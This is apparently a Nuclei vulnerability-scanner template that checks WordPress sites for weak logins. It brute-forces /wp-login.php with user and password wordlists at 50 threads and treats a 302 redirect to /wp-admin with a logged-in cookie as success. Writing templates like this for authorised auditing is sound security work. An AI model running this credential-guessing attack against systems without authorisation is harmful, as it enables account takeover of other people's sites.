id: wordpress-weak-credentials

info:
  name: WordPress - Weak Credentials
  author: evolutionsec
  severity: critical
  description: |
    Weak WordPress Credentials were discovered.
  reference:
    - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-1391
  tags: wordpress,default-login,fuzz

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        log={{users}}&pwd={{passwords}}

    payloads:
      users: helpers/wordlists/wp-users.txt
      passwords: helpers/wordlists/wp-passwords.txt
    threads: 50
    attack: clusterbomb

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

      - type: status
        status:
          - 302

# Enhanced by mp on 2022/05/19
